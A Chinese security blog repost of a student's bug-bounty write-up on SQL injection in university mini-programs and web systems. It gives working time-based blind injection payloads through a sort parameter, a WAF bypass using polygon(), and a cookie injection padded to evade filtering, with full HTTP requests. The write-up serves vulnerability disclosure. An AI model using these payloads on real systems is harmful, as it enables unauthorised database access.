原创 | EDUSRC实战分享

admin
admin
admin
138635
文章
114
评论
2024年8月21日10:22:46评论26 views字数 2324阅读7分44秒阅读模式

原创 | EDUSRC实战分享

某大学校小程序存在sql注入(关键字注入)

 burp拦截请求包,点击行页旁边的排序,随便选一个,抓包,参数sort存在排序注入

POST /xxx-mobile/xxxList/findMoreAlumniuser HTTP/1.1Host: x.x.x.xContent-Length: 33Xweb_xhr: 1Orgcode: hunauMtoken: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF XWEB/8447Content-Type: application/jsonAccept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close"page":1,"size":20,"sort":"asc"

payload:

"sort":"asc,1/if(length(database())=6,sleep(3),0)"

执行长度至6时出现报错

对比长度7 "sort":"asc,1/if(length(database())=7,sleep(3),0)" 页面正常回显

使用截取函数截取数据库首字母 使用payload:

 "sort":"asc,1/if(mid(database(),1,1)='a',sleep(3),0)"

  对比第一个字母为b,正常回显

"sort":"asc,1/if(mid(database(),1,1)='b',sleep(3),0)"

某大学sql注入(伪静态注入)

发现有伪静态注入,一个单引号报错,报错sql语句

原创 | EDUSRC实战分享

尝试and是否过滤,发现and没有被过滤

原创 | EDUSRC实战分享

尝试报错注入,发现普通的报错语句被waf拦截了

原创 | EDUSRC实战分享

经过不断尝试,发现%23(#号),空格没有过滤,并且id是数字型,是括号闭合

.最后发现polygon函数没有被过滤,能够根据字段名爆出表名和列名

原创 | EDUSRC实战分享

某大学工作流程系统存在sql注入(cookie关键字)

选择授权人这地方会加载一个接口,依靠cookie中的FK_Dept做一个数据库查询 加长cookie里的值,长度溢出后waf不在拦截,如下

原创 | EDUSRC实战分享

POST /flxx/xF/xxxm/Hxxxler.ashx?DoType=HttpHandler&DoMethod=xxxxEmps_Init&HttpHandlerName=BP.WF.HttpHandler.WF_WorkOpt&t=0.16834035484236243 HTTP/1.1 Host:  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 30 Origin:  Connection: close Cookie: ASP.NET_SessionId=xxx5nsbt0sur;CCS=No=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&Name=%e5%90%b4%e9%b9%8f&IsRememberMe=0&FK_Dept=10002'and 1=@@version and '1'='1&FK_DeptName=%e6%a0%a1%e9%a2%86%e5%af%bc&Token=rtginjxxxxxxlt5nsbt0sur&SID=rtgixxxxxmutlt5nsbt0sur&Lang=CH&Auth=&AuthName=FK_Node=null&FK_Dept=100021111

作者:船山院士网络安全团队学员  小胡同学

原文始发于微信公众号(船山信安):原创 | EDUSRC实战分享

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月21日10:22:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   原创 | EDUSRC实战分享https://cn-sec.com/archives/3082738.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息